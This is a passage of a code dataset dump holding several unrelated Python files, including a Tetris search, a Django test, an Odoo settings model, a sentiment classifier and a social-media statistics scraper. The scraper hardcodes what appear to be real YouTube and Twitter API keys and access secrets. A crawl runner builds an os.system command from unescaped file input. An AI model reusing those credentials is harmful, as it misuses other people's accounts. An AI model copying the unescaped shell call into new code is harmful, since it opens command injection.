0) \n highests[highests == 0 & np.logical_not(self.bits[0])] = self.board_size[0]\n doesNotTouchCeiling = (highests * (highests > 1))\n for num, (i, j) in enumerate(zip(doesNotTouchCeiling[:-1], doesNotTouchCeiling[1:])):\n if i > 0 and j > 0: \n ind = min(highests[range(num, num + 2)]) - 1\n if highests[num] == highests[num+1]:\n mask = np.zeros(self.board_size, dtype=bool)\n mask[ind-1, num] = True\n mask[ind, num] = True\n mask[ind-1, num+1] = True\n mask[ind, num+1] = True\n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b) \n return(children) \n def __str__(self):\n outstr = \"\"\n for x in self.bits:\n for y in x:\n if y:\n outstr += \"o \"\n else: \n outstr += \". 
\"\n            outstr += \"\\n\"\n        return outstr    \n\n    def countChildren(self, num = 0):\n        for x in self.children:\n            num = x.countChildren(num)\n        return num + len(self.children)    \n    \n    def printTerminalNodes(self):\n        for x in self.children:\n            x.printTerminalNodes()\n            if not x.children:\n                print(x)\n    \n    def calculateScore(self):\n        return(np.min(np.where(self.bits)[0]), getLongestLowest(self.bits))\n    \n\ndef getLongestLowest(bits):\n    horizontal_length = bits.shape[1]\n    lowest = np.max(np.where(bits)[0])\n    tot = np.sum(np.all(bits,1)) * horizontal_length\n    for n1 in range(horizontal_length):  \n        if not bits[lowest][n1]:\n            c = 1  \n            for n2 in range(n1+1, horizontal_length):\n                c += 1\n                if bits[lowest][n2]:\n                    break\n            tot = max(c, tot)  \n    return(tot)   \n\nn = 100\nboard_size = (20, 10)\na = Board(np.zeros(board_size, dtype=bool), 0, 5, board_size)\nchildren = []\nchildren.extend(a.generateBoard(\"O\")[:n])\nchildren.extend(a.generateBoard(\"I\")[:n])\na.children = children\na.children.sort(key=lambda s: s.score, reverse=True)\nfor x in a.children: \n    children = []\n    children.extend(x.generateBoard(\"O\")[:n])\n    children.extend(x.generateBoard(\"I\")[:n])\n    x.children = children\n    x.children.sort(key=lambda s: s.score, reverse=True)\n    for y in x.children:\n        children = []\n        children.extend(y.generateBoard(\"O\")[:n])\n        children.extend(y.generateBoard(\"I\")[:n])\n        y.children = children\n        y.children.sort(key=lambda s: s.score, reverse=True)\n        for z in y.children:\n            children = []\n            children.extend(z.generateBoard(\"O\")[:n])\n            children.extend(z.generateBoard(\"I\")[:n])\n            z.children = children\n            z.children.sort(key=lambda s: s.score, reverse=True)\n    \na.countChildren()\n\n\nprint(z)\n","sub_path":"Tetris/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"192546291","text":"from nider.core import Font\nfrom nider.core import Outline\nfrom nider.models import Content\nfrom nider.models import Linkback\nfrom nider.models import Paragraph\nfrom nider.models import Image\nimport json\n\nf = open(\"quotes.json\", \"r\")\nFile_json = json.load(f, encoding='ISO 8859-1')\nroboto_font_folder = '/home/ziad/Desktop/Console_Posts/Posts/'\ntext_outline = Outline(2, '#121212')\n\ndef img_to_txt(txt,author,result):\n    para = Paragraph(text=txt,\n                      font=Font(roboto_font_folder + 'Roboto-Black.ttf',30),\n                      text_width=30,\n                      align='center',\n                      color='#ededed',\n                      outline=text_outline\n                      )\n    linkback = Linkback(text=author,\n                        font=Font(roboto_font_folder + 'Roboto-Black.ttf',30),\n                        color='#ededed',\n                        outline=text_outline\n                        )\n    content = Content(paragraph=para, linkback=linkback)\n    img = Image(content,\n                fullpath=result,\n                width=3000,\n                height=2005\n                )\n    img.draw_on_image('bg.png')\ndef quote_Text(counter):\n    global File_json\n    quoteText = File_json[counter]['quoteText']\n    return quoteText\ndef quote_Author(counter):\n    global File_json\n    quoteAuthor = \"-\" + File_json[counter]['quoteAuthor'] \n    return quoteAuthor\nfor counter in range(550):\n    result = str(counter) + \".png\"\n    img_to_txt(quote_Text(counter),quote_Author(counter),result)\n","sub_path":"img_return.py","file_name":"img_return.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"72745364","text":"from .base import 
FunctionalTest\nfrom .list_page import ListPage\nfrom .my_lists_page import MyListsPage\n\ndef quit_if_possible(browser):\n #try: browser.quit()\n #except: pass\n browser.quit()\n\nclass SharingTest(FunctionalTest):\n def test_can_share_a_list_with_another_user_pt1(self):\n list_page = ListPage(self)\n \n # Edith is a logged-in user\n self.create_pre_authenticated_session('edith@example.com')\n\n # Edith goes to the home page and starts a list\n self.browser.get(self.live_server_url)\n \n list_page.add_list_item('Get help')\n \n # She notices a \"Share this list\" option\n share_box = list_page.get_share_box()\n \n # and notices that the placeholder \"your-friend@example.com\" is present\n self.assertEqual(\n share_box.get_attribute('placeholder'),\n 'your-friend@example.com'\n )\n \n # She shares her list by entering the email address of a friend\n # The page updates to say that it's shared with Oniciferous:\n list_page.share_list_with('oniciferous@example.com')\n\n\n ## note - in order for this to work, all 3 parts need to be made part of the same test. Because otherwise, the temporary database used is destroyed between tests, creating a false error\n #def test_can_share_a_list_with_another_user_pt2(self):\n # list_page = ListPage(self)\n\n # Ediths friend Oniciferous is also hanging out on the lists site as a logged in user\n self.create_pre_authenticated_session('oniciferous@example.com')\n\n # Oniciferous goes to the lists page with his browser\n MyListsPage(self).go_to_my_lists_page()\n\n # He sees Edith's list in there!\n self.browser.find_element_by_link_text('Get help').click()\n\n # On the list page, Oniciferous can see says that it's Edith's list\n self.wait_for(lambda: self.assertIn(\n 'edith@example.com',\n list_page.get_list_owner()\n ))\n\n # He adds an item to the list\n list_page.add_list_item('Hi Edith!')\n\n #def test_can_share_a_list_with_another_user_pt3(self):\n # list_page = ListPage(self)\n\n # When Edith refreshes the page, she sees Oniciferous's addition\n self.create_pre_authenticated_session('edith@example.com')\n\n # Edith goes to the lists page in her browser\n MyListsPage(self).go_to_my_lists_page()\n\n # She clicks on the list that she created earlier\n self.browser.find_element_by_link_text('Get help').click()\n\n # And finds that Oniciferous has added something to her list\n list_page.wait_for_row_in_list_table('Hi Edith!', 2)\n \n \n ","sub_path":"functional_tests/test_sharing.py","file_name":"test_sharing.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"2636082","text":"# -*- coding: utf-8 -*-\n###################################################################################\n#\n# Copyright (C) 2020 Odox SoftHub LLP()\n# Author: Albin Mathew()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see .\n#\n###################################################################################\n\nfrom odoo import api, fields, models\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n commission_account_id = fields.Many2one(comodel_name='account.account', string=\"Commission Account\")\n discount_account_id = fields.Many2one(comodel_name='account.account', string=\"Discount Account\")\n bank_fee_account_id = fields.Many2one(comodel_name='account.account', string=\"Bank Fee Account\")\n currency_diff_account_id = fields.Many2one(comodel_name='account.account', string=\"Currency Diff Account\")\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo()\n res.update(\n commission_account_id=int(params.get_param('odx_sale_purchase_customization.commission_account_id')),\n\n )\n res.update(\n discount_account_id=int(params.get_param('odx_sale_purchase_customization.discount_account_id')),\n\n )\n res.update(\n bank_fee_account_id=int(params.get_param('odx_sale_purchase_customization.bank_fee_account_id')),\n\n )\n res.update(\n currency_diff_account_id=int(params.get_param('odx_sale_purchase_customization.currency_diff_account_id')),\n\n )\n\n return res\n\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.commission_account_id\",\n self.commission_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.discount_account_id\",\n self.discount_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.bank_fee_account_id\",\n self.bank_fee_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.currency_diff_account_id\",\n self.currency_diff_account_id.id)\n\n\n\n","sub_path":"odx_sale_purchase_customization/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"345334325","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 30 18:51:15 2018\n\n@author: brihat\n\"\"\"\n\n#import nltk\n#nltk.download('stopwords')\n#nltk.download('punkt')\nfrom nltk.corpus import stopwords\n\nfrom sklearn.model_selection import train_test_split\n#from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import SGDClassifier\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import numpy as np\n\nclass MovieReviews:\n \n def readText(filename):\n DF = pd.read_csv(filename, sep = \"\\n\", header = None)\n DF.columns = ['Reviews']\n return DF\n \n \n def splitDataframe(pandasDataFrame):\n train, test = train_test_split(pandasDataFrame, test_size = 0.15)\n return train, test\n \n def mergeDataFrame(pandasDataFrame1, pandasDataFrame2, pos, neg):\n DF1 = pandasDataFrame1.assign(label = pos)\n DF2 = pandasDataFrame2.assign(label = neg)\n df_new = pd.concat([DF1, DF2])\n return df_new\n \n def usePipeline(pandasDataFrame):\n stop = set(stopwords.words('english'))\n text_clf = Pipeline([('vect', TfidfVectorizer(ngram_range = (1, 2), min_df = 2, stop_words = stop)),\n 
('clf', SGDClassifier()),])\n\n return text_clf\n \n \n def fitTrainData(text_clf, pandasDataFrame):\n text_clf.fit(pandasDataFrame.Reviews, pandasDataFrame.label)\n return text_clf\n \n def predictionWithAccuracy(text_clf, pandasDataFrame):\n predicted = text_clf.predict(pandasDataFrame.Reviews)\n #accuracy = np.mean(predicted == pandasDataFrame.label)\n return predicted\n \n def getMetrics(gs_clf, pandasDataFrame):\n target_names = ['PR', 'NR']\n predictionList = gs_clf.predict(pandasDataFrame.Reviews)\n result = metrics.classification_report(pandasDataFrame.label, predictionList, target_names = target_names)\n return result, predictionList\n \n def getConfusionMatrix(pandasDataFrame, predictionList):\n conf_matrix = metrics.confusion_matrix(pandasDataFrame.label, predictionList)\n return conf_matrix\n \n def useGridSearch(text_clf, pandasDataFrame):\n C = [0.00001, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100]\n param_grid = [{'clf__alpha': C, 'clf__loss': ['hinge', 'squared_hinge', 'log'], 'clf__max_iter': [100]}]\n gs_clf = GridSearchCV(text_clf, param_grid = param_grid, cv = 10, n_jobs = -1)\n gs_clf = gs_clf.fit(pandasDataFrame.Reviews, pandasDataFrame.label)\n best_score = gs_clf.best_score_\n best_param = gs_clf.best_params_\n return gs_clf, best_score, best_param\n \n def getROCCurve(gs_clf, pandasDataFrame):\n score_roc = gs_clf.decision_function(pandasDataFrame.Reviews)\n fpr, tpr, thresholds = metrics.roc_curve(pandasDataFrame.label, score_roc)\n roc_auc = metrics.auc(fpr, tpr)\n plt.title('Receiver Operating Characteristic')\n plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc)\n plt.legend(loc = 'lower right')\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.plot([0,1], [0, 1], 'r--')\n plt.show()\n \nif __name__ == '__main__':\n RD = MovieReviews\n posReviewDF = RD.readText(\"rt-polarity.pos\")\n negReviewDF = RD.readText(\"rt-polarity.neg\")\n #print (negReviewDF) \n #posReviewDF1 = RD.removeStopwords(posReviewDF)\n #negReviewDF1 = RD.removeStopwords(negReviewDF)\n #print(posReviewDF1)\n posReviewDFTrain, posReviewDFTest = RD.splitDataframe(posReviewDF)\n negReviewDFTrain, negReviewDFTest = RD.splitDataframe(negReviewDF)\n #print(negReviewDFTrain) \n reviewTrainDF = RD.mergeDataFrame(posReviewDFTrain, negReviewDFTrain, 1, 0)\n reviewTestDF = RD.mergeDataFrame(posReviewDFTest, negReviewDFTest, 1, 0)\n print(negReviewDFTest)\n print(posReviewDFTest)\n print(posReviewDFTest.shape, negReviewDFTest.shape)\n print(reviewTestDF.shape)\n text_clf = RD.usePipeline(reviewTrainDF) \n gs_clf, best_score, best_param = RD.useGridSearch(text_clf, reviewTrainDF)\n print(\"best_score: \")\n print(best_score)\n print(\"Best Parameter: \")\n print(best_param)\n MetricsF1Scores, predictionList = RD.getMetrics(gs_clf, reviewTestDF)\n print(\"Metrics: \")\n print(MetricsF1Scores)\n conf_matrix = RD.getConfusionMatrix(reviewTestDF, predictionList)\n print(\"Confusion Matrix :\")\n print(conf_matrix)\n \n RD.getROCCurve(gs_clf, reviewTestDF)\n \n ","sub_path":"src/MovieReviewSGDclassifier.py","file_name":"MovieReviewSGDclassifier.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"607823293","text":"import unittest\nfrom torch.autograd import gradcheck\nfrom quantize import *\n\nclass TestQuantize(unittest.TestCase):\n def test_softmin_back(self):\n x = (torch.rand(20, 10, dtype=torch.double, requires_grad=True),)\n self.assertTrue(gradcheck(softmin, x))\n\n def 
test_quantize(self):\n x = 2*torch.rand((100, 100), dtype=torch.double) - 1\n centers = 2*torch.arange(200, dtype=torch.double)*1/200 - 1\n qx = quantize(x, centers, 0.1)\n ax = (x * 100).round() / 100\n print(x)\n print(qx)\n self.assertTrue(torch.mean(torch.abs(qx - ax)) < 1/400)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_quantize.py","file_name":"test_quantize.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230091423","text":"\"\"\"\nnaming conventions\nclass names = camelCase\nnormal variables and functions = names_with_underscore\nglobal variables = CAPITAL\nglobal constant varibales = CAPITAL_CONST\n\"\"\"\n\nimport firebase_admin\nfrom firebase_admin import credentials\nimport connection\nimport threading\n\nFIREBASE_URL_CONST = \"\"\nPRIVATE_KEY_PATH = \"\"\n\ndef thread():\n t1 = threading.Thread(target=hardware.get_gps)\n t2 = threading.Thread(target=hardware.get_rfid)\n t3 = threading.Thread(target=hardware.get_camera)\n t1.start()\n t2.start()\n t3.start()\n\nif __name__ == \"__main__\":\n import sys\n\n cred = credentials.Certificate(PRIVATE_KEY_PATH)\n firebase_admin.initialize_app(cred, {\n 'databaseURL': FIREBASE_URL_CONST\n })\n\n hardware = connection.piHandler()\n thread()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115523582","text":"# Opus/UrbanSim urban simulation software.\r\n# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington\r\n# See opus_core/LICENSE \r\n\r\nfrom urbansim.abstract_variables.abstract_number_of_agents_with_same_attribute_value import abstract_number_of_agents_with_same_attribute_value\r\n\r\nclass same_sector_employment_in_zone(abstract_number_of_agents_with_same_attribute_value):\r\n \"\"\"\"\"\"\r\n \r\n agent_attribute_name = \"job.sector_id\"\r\n agent_dependencies = ['urbansim_parcel.job.zone_id']\r\n choice_set_dependencies = ['urbansim_parcel.building.zone_id']\r\n #unique_agent_attribute_value = range(1, 20)\r\n geography_dataset_name = 'zone'\r\n ## use default\r\n #expression_agents_of_attribute_by_geography = \"'agents_of_attribute_%(agent_attribute_value)s = %(geography_dataset_name)s.aggregate(%(agent_attribute_name)s==%(agent_attribute_value)s)'\"\r\n \r\n \r\nfrom opus_core.tests import opus_unittest\r\nfrom opus_core.tests.utils.variable_tester import VariableTester\r\nfrom numpy import arange, array\r\nfrom numpy import ma\r\nclass Tests(opus_unittest.OpusTestCase):\r\n \r\n def test_my_inputs(self):\r\n tester = VariableTester(\r\n __file__,\r\n package_order=['urbansim_parcel', 'urbansim', 'opus_core'],\r\n test_data={\r\n \"job\":{ \r\n 'job_id': array([1, 2, 3, 4, 5, 6]),\r\n 'building_id':array([1, 1, 5, 3, 3, 3]),\r\n 'sector_id': array([1, 1, 2, 1, 3, 3]),\r\n }, \r\n \"building\":{ \r\n 'building_id': array([1, 2, 3, 4, 5,]),\r\n 'zone_id': array([1, 2, 2, 3, 4,]),\r\n },\r\n 'zone':{\r\n 'zone_id': array([1,2,3,4]),\r\n },\r\n })\r\n ## mind the mirror of gridcells in waling_distance calculus\r\n should_be = array([[2, 1, 1, 0, 0], \r\n [2, 1, 1, 0, 0],\r\n [0, 0, 0, 0, 1],\r\n [2, 1, 1, 0, 0],\r\n [0, 2, 2, 0, 0],\r\n [0, 2, 2, 0, 0]])\r\n \r\n tester.test_is_close_for_variable_defined_by_this_module(self, should_be)\r\n\r\n\r\nif __name__=='__main__':\r\n 
opus_unittest.main()\r\n","sub_path":"urbansim_parcel/job_x_building/same_sector_employment_in_zone.py","file_name":"same_sector_employment_in_zone.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"43748699","text":"import json\nimport requests\nimport sys\nimport datetime\nimport time\nimport pandas\nimport tweepy\nfrom TwitterAPI import TwitterAPI\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nsys.stdout.flush()\n\n\ndef instagram_api(keyword):\n url1 = 'https://www.instagram.com/web/search/topsearch/?query='\n url2 = keyword\n url = url1 + url2\n\n response = requests.get(url)\n response_data = response.json()\n\n # GET FOLLOWER COUNT & HASHTAG COUNT\n follower_count = response_data['users'][0]['user']['follower_count']\n hashtag_count = 0\n for hashtag in response_data['hashtags']:\n hashtag_count += hashtag['hashtag']['media_count']\n\n return(follower_count, hashtag_count)\n\n\ndef youtube_id_mapping(input_list):\n out_list = []\n for i in input_list:\n q = i\n key = \"AIzaSyCXfJz6Z8X30I9GgFg14z2M6sQfhNObo5U\"\n url = \"https://www.googleapis.com/youtube/v3/search?part=snippet&q=\" + q + \"&type=channel\" + \"&key=\" + key\n response = requests.get(url)\n response_data = response.json()\n out_list.append(response_data['items'][0]['id']['channelId'])\n\n return out_list\n\n\ndef youtube_api(user_id):\n key = 'AIzaSyCXfJz6Z8X30I9GgFg14z2M6sQfhNObo5U'\n url = \"https://www.googleapis.com/youtube/v3/channels?part=statistics&id=\" + user_id + \"&key=\" + key\n # User Name으로 접근하기\n #url = \"https://www.googleapis.com/youtube/v3/channels?part=statistics&forUsername=\"+name+\"&key=\"+key\n\n response = requests.get(url)\n response_data = response.json()\n\n out_data = response_data['items'][0]['statistics']\n return(int(out_data['viewCount']), int(out_data['commentCount']), int(out_data['subscriberCount']), int(out_data['videoCount']))\n\n\ndef twitter_api(keyword):\n # Consumner_key & Secret / Access_Token & Secret\n consumer_key = \"mq7ecRYTpx3OXcF6E5pCTGZTF\"\n consumer_secret = \"tRboVBFKrnxAXEjaNwwBRfWgZAqXowETSqKOtdSU4RNZUM9NSG\"\n\n access_token = \"991892597391081473-sXwXOYP253t85KWEBrqs3WPpOu7its4\"\n access_token_secret = \"pPiDRxsb5CZjdyZXZahzlFBl1xwfQ7hTTVxLJdKbA4xwd\"\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())\n\n # Get user's information -> follower count, favorite count, friends count, listed count\n user = api.search_users(keyword)\n user = user[0]\n return(user['followers_count'], user['favourites_count'], user['friends_count'], user['listed_count'])\n\n\n\n\n\n\n###############################################################\n# 자동으로 시간별 데이터 쌓기 (기간 단위 = 5분으로 Test)\n###############################################################\nprint('Start Test & nohup out test', flush=True)\n\n# SETTING\ntest_term = 60*5 # term = seconds (test: 5분씩 갱신 -> 1주일씩 갱신하려면 test_term = 60*60*24*7)\nres_list = [\"Nando’s\", \"KFC\", \"Subway\", \"Burger King\",\"Pizza Hut\", \"Domino’s\", \"Carl’s JR.\", \"Green Burrito\",\n \"McDonald’s\", \"Dunkin’ Donuts\", \"Tacobell\", \"Auntie Anne’s\", \"Cinnabon\",\"Charleys Philly Steak\",\n \"Quiznos\", \"Nathan’s Famous\", \"Red Robin\", \"Gourmet Burgers and Brew\",\"Shake shack\",\n \"Five Guys\", \"Chipotle\", \"In-N-Out\", \"Jack in the box\"] #release(1) company list\n\n\n# Res name -> HASHTAG 때문에 
특수문자 제거 필요\ntem_res_list = []\nfor i in res_list:\n tem = i.replace(\"\\'\",\"\")\n tem = tem.replace(\"’\",\"\")\n tem = tem.replace(\".\",\"\")\n tem = tem.replace(\",\",\"\")\n tem = tem.replace(\"-\",\"\")\n tem_res_list.append(tem)\n\nres_list = tem_res_list\nyoutube_id_list = youtube_id_mapping(res_list) # 각 식당에 대한 유튜브 id 맵핑\n\n\n# WHILE LOOP\ntest_count = 0 # Test시에는 무한루프가 최대 100번 돌도록 설정\ntest_limit = 100\n\nwhile(True):\n date_list = []\n name_list = []\n instagram_follow_count_list = []\n instagram_hashtag_count_list = []\n youtube_view_count_list = []\n youtube_comment_count_list = []\n youtube_subscriber_count_list = []\n youtube_video_count_list = []\n twitter_follower_count_list = []\n twitter_favorite_count_list = []\n twitter_friends_count_list = []\n twitter_listed_count_list = []\n\n if test_count == test_limit:\n print(\"FINISH\", flush = True)\n break\n test_count += 1\n \n time.sleep(test_term)\n time_key = datetime.datetime.now()\n\n for i in range(len(res_list)):\n time.sleep(60) # Twitter api -> call 당 time.sleep(60) 필요함\n tem_list = []\n try:\n insta_follower, insta_hashtag = instagram_api(res_list[i])\n except:\n insta_follower, insta_hashtag = 0,0\n\n try:\n twit_follower, twit_favorites, twit_friends, twit_listed = twitter_api(res_list[i])\n except:\n twit_follower, twit_favorites, twit_friends, twit_listed = 0,0,0,0\n\n try:\n youtub_view, youtub_comment, youtub_subscriber, youtub_video =youtube_api(youtube_id_list[i])\n except:\n youtub_view, youtub_comment, youtub_subscriber, youtub_video = 0,0,0,0\n \n date_list.append(time_key)\n\n\n #BIG QUERY에 쌓을 때 레스토랑 네임 -> 소문자, 공백제거로 통일\n res_name = str(res_list[i]).lower()\n res_name = res_name.replace(\" \",\"\")\n name_list.append(res_name)\n\n instagram_follow_count_list.append(insta_follower)\n instagram_hashtag_count_list.append(insta_hashtag)\n youtube_view_count_list.append(youtub_view)\n youtube_comment_count_list.append(youtub_comment)\n youtube_subscriber_count_list.append(youtub_subscriber)\n youtube_video_count_list.append(youtub_video)\n twitter_follower_count_list.append(twit_follower)\n twitter_favorite_count_list.append(twit_favorites)\n twitter_friends_count_list.append(twit_friends)\n twitter_listed_count_list.append(twit_listed)\n\n df = pandas.DataFrame({'date' : date_list, 'name' : name_list, 'instagram_follow_count' : instagram_follow_count_list,\n 'instagram_hashtag_count' : instagram_hashtag_count_list, 'youtube_view_count' : youtube_view_count_list,\n 'youtube_comment_count' : youtube_comment_count_list, 'youtube_subscriber_count' : youtube_subscriber_count_list,\n 'youtube_video_count' : youtube_video_count_list, 'twitter_follower_count' : twitter_follower_count_list,\n 'twitter_favorite_count' : twitter_favorite_count_list, 'twitter_friend_count' : twitter_friends_count_list,\n 'twitter_listed_count' : twitter_listed_count_list})\n\n pandas.DataFrame.to_gbq(df, 'SNS_data.last_test', 'datamingo', if_exists = 'append', chunksize = 10000, verbose = True)\n print(datetime.datetime.now(), 'big query update!', flush=True)","sub_path":"SNS_api/data_to_bigquery_server.py","file_name":"data_to_bigquery_server.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77357388","text":"num = (int(input('Digite um número: ')),\n int(input('Digite outro número: ')),\n int(input('Digite mais um número: ')),\n int(input('Digite o último número: ')))\npar = 0\nprint(f'Você digitou os valores: {num}')\nif 9 in num:\n 
print(f'O valor 9 apareceu {num.count(9)} vezes.')\nelse:\n print(f'O valor 9 não foi digitado')\nif 3 in num :\n print(f'O valor 3 apareceu na {num.index(3)+1}ª posição.')\nelse:\n print(f'O valor 3 não foi digitado.')\nfor i in num:\n if i % 2 == 0:\n par += 1\nprint(f'Os valores pares digitados foram {par}')\n","sub_path":"ex075.py","file_name":"ex075.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"6087205","text":"#Keras supplies many datasets in their library aptly named datasets\nfrom keras.datasets import fashion_mnist #https://keras.io/datasets/\n\n#We store the training and testing images in the following variables\n\n(train_X, train_Y), (test_X, test_Y) = fashion_mnist.load_data()\n\n\nimport numpy as np #for linear algebra\n\n#To see what dimensions I am working with:\nprint(\"Dimension of training input and output\")\nprint(train_X.shape, train_Y.shape)\n#(60000, 28, 28), (60000,)\nprint(\"Dimensions of test input and output\")\nprint(test_X.shape, test_Y.shape)\n#(10000, 28, 28), (10000,)\n\"\"\"\nSo training data is 60000 samples with each sample havinga 28x28 pixel dimension\nand the test data is 10000 samples with the same dimensions\n\nNext we find the number of unique labels in the output using numpy\n\"\"\"\nprint(\"Unique labels to classify and total number of unique lables \")\nprint(np.unique(train_Y), len(np.unique(train_Y)))\n#(array([0,1,2,3,4,5,6,7,8,9]), 10)\n\"\"\"\nThere are 10 total output labels ranging from 0 - 9\nNow we want to reshape the images into a matrix of 28x28x1 to feed the CNN\nand then normalize the data into a float format ranging from 0-1.\n\"\"\"\ntrain_X = train_X.reshape(-1, 28, 28, 1)\ntest_X = test_X.reshape(-1, 28, 28, 1)\n#Reshapes to ((60000, 28, 28, 1), (10000, 28, 28, 1))\n\ntrain_X = train_X.astype('float32')\ntest_X = test_X.astype('float32')\n\ntrain_X = train_X / 255.0\ntest_X = test_X / 255.0\n\n\"\"\"\nNow the NN is not going to understand the labels in the train_Y and test_Y\nthe way they are now, so we must transform the labels into a 'vector'\ni.e if the output label is 1, we want the vector to be [0, 1, 0, 0, 0, 0, 0, 0, 0, 0]\nand if the label is 9 -> [0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n\"\"\"\nfrom keras.utils import to_categorical #https://keras.io/utils/\n#converts an array into a binary class matrix\ntrain_Y_binary = to_categorical(train_Y)\n#Converts all to the binary representation\ntest_Y_binary = to_categorical(test_Y)\n#both have size (N, 10) where N is number of samples - 60000 for train and 10000 for test\n\"\"\"\nAlways important in ML is splitting of the data into two parts, one for training and one for validation\nI choose a 80% to 20% split of training data to validate data respectively\nIn addition, we can randomize the data order with sklearns train_test_split\n\n\"\"\"\nfrom sklearn.model_selection import train_test_split #https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html\ntrain_X,valid_X,train_label,valid_label = train_test_split(train_X, train_Y_binary, test_size=0.2, random_state=13)\n#train_X.shape: (48000, 28, 28, 1), valid_X.shape: (12000, 28, 28, 1), train_label.shape: (48000, 10), valid_label.shape: (12000, 10)\n#Now we are ready to use the data:\n","sub_path":"initial_data_analysis.py","file_name":"initial_data_analysis.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"524187988","text":"\"\"\"\nThis file reads city names from cities-queue.txt and starts running crawl from the top.\nAfter reading a city name it deletes the line. Hence, the next un-crawled city name comes to the top.\nSo, multiple instances of this script can be run at the same time to increase efficiency.\n\"\"\"\nimport json\nimport os\nfrom urllib.request import urlopen\nfrom general import append_to_file\n\nwith open('cities-queue.txt') as infile:\n characters = 0\n for line in infile:\n wordslist = line.split()\n characters += sum(len(word)+1 for word in wordslist)\n\n\nwhile True:\n city = None\n rf = open(\"run.py-offset-setter.txt\", \"r\")\n offset = int(rf.readline()[9:].strip())\n rf.close()\n\n if offset >= characters:\n break\n\n with open('cities-queue.txt', 'r+') as f:\n while True:\n f.seek(offset, 0)\n line = f.readline()\n offset = offset + len(line)\n\n rf = open(\"run.py-offset-setter.txt\", \"w\")\n rf.write(\"offset = \" + str(offset))\n rf.close()\n\n if not line or line == \"\\n\":\n continue\n\n if line.strip()[0] != \"#\":\n city = line.strip()\n break\n\n city_url_name = city.replace(\" \", \"%20\")\n \"\"\"\n Find document ID from url\n \"\"\"\n url = \"https://www.tripadvisor.in/TypeAheadJson?action=API&query=\" + city_url_name + \"&types=geo&name_\" \\\n \"depth=1&details=true&legacy_format=true&rescue=true&max=8&uiOrigin=Attractions_\" \\\n \"geopicker&source=Attractions_geopicker&searchSessionId=7B739CEC86558248C6D84290316117ED1575889411248ssid&\" \\\n \"scope=1&beforeGeoId=1&afterGeoId=1&startTime=1575892064630\"\n\n json_url = urlopen(url)\n data = json.loads(json_url.read())\n try:\n document_id = data[0].get(\"document_id\")\n except Exception as e:\n document_id = None\n if document_id is None or document_id.isdigit() is False:\n append_to_file(\"list-of-cities-not-found.txt\", city)\n print(\"document_id not found\")\n continue\n print(city + \": Document ID:\" + document_id)\n\n cmd = \"python tripadvis-crawl.py --city=\\\"\" + city + \"\\\" --id=\" + document_id\n os.system(cmd)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215083333","text":"#Change strings in multiple files \nimport sys\nimport 